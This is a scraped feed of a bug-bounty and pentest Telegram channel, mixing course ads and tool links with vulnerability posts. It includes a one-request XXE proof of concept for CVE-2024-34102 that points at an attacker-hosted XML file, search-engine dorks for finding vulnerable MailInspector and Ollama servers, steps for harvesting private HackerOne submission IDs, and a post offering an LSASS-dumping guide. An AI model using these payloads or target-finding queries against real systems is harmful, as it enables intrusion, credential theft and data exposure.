Brut Security
15.1K subscribers
965 photos
76 videos
292 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
Brut Security pinned ยซKeep checking my old Posts to continue your learning Process!ยป
Methods for Dump LSASS.pdf
33.4 MB
๐Ÿ’ฅMethods for Dump LSASS๐Ÿ’ฅ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ2
โ˜„๏ธKnoXSS XSS Payload - confirm?.(1)
๐Ÿ”Credit- @lu3ky13

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿซก4๐Ÿคฏ2
๐Ÿ‘€Top 1% on TryHackMe? Thatโ€™s Cute๐Ÿ‘€

๐ŸคกI've seen a lot of posts lately celebrating being in the top 1% on TryHackMe, but let's take a step back. While it's great to challenge yourself with these platforms, does ranking highly truly reflect practical, real-world experience?

๐Ÿ™‚In the ever-evolving field of cybersecurity, hands-on experience and the ability to adapt to real-world situations are what truly count. Ranking in the top 1% on a practice platform like TryHackMe is commendable, but it shouldn't be confused with actual industry experience.

โœ‰๏ธThoughts?
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘6โคโ€๐Ÿ”ฅ5๐Ÿ”ฅ1
โ˜„๏ธCVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!

๐Ÿ“ฃAn issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

๐ŸšซPoC: https://lnkd.in/gK4NHJ4C
โ›”๏ธVideo POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share

๐ŸŒDorks:
Hunter: web.title=="..:: HSC MailInspector ::.."
FOFA: title=="..:: HSC MailInspector ::.."
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ4โคโ€๐Ÿ”ฅ1๐Ÿ‘1
๐Ÿ’ฅ Registration Open for July Batch: Extreme Web Application Penetration Testing ๐Ÿ’ฅ

โš ๏ธSlots Remaining 4

๐Ÿ’ฏRegistration Link:
https://lnkd.in/g7MjfrXG

Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!


๐Ÿ–ฅ Starts: July Mid, 2024
โ„น๏ธ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
โธ Mode: Online | Language: English
๐Ÿ”— Course Module:
https://lnkd.in/gfZbBCFn
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘1
ceh-v12-exam-set.pdf
1.6 MB
โ˜„๏ธSharpen your skills for the Certified Ethical Hacker v12 exam with these practice questionsโ˜„๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘1
Subdomain Enumeration Tools UHD.pdf
127.4 KB
Subdomain Enumeration Tools

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘6๐Ÿคก5๐Ÿคฃ2๐Ÿณ1๐Ÿค1
๐Ÿ”ซSmap - passive Nmap like scanner built with shodan.io

๐Ÿ˜ Smap is a port scanner built with shodan.io's free API. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.

๐Ÿคจ Read more: https://github.com/s0md3v/Smap

๐Ÿ˜#infosec #cybersecurity #hacking #pentesting #security
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โคโ€๐Ÿ”ฅ1
โ–ถ๏ธThis June Batch Filled with talented Students ๐Ÿซถ

๐Ÿ‘€July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฏ1
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity
๐ŸšจCVE-2024-37032: Probllamaโ€”Ollama Remote Code Execution Vulnerability

โš ๏ธThe issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.

๐Ÿ”ฅPoC:
https://lnkd.in/gk6Wvq_P

๐Ÿ’ฅDorks:
Hunter: /
product.name="Ollama Web"
FOFA: app="Ollama-Web"
๐Ÿ”ฅ1
๐Ÿ›กJoin The Discussion Group
๐Ÿ”—https://t.me/brutsec
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
๐Ÿ‘8
IDOR on HackerOne Embedded Submission Form ๐Ÿ’ฐ ๐Ÿ’ฒ
-
Steps to reproduce (obtaining inactive UUID of many private programs)

1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
๐Ÿ‘3
China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "้‡ๅบ†ๅผ€ๆบๅ…ฑๅˆ›็ง‘ๆŠ€ๆœ‰้™ๅ…ฌๅธ"

It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.

tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.

Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA


#github #gitcode
๐Ÿณ3๐Ÿ‘1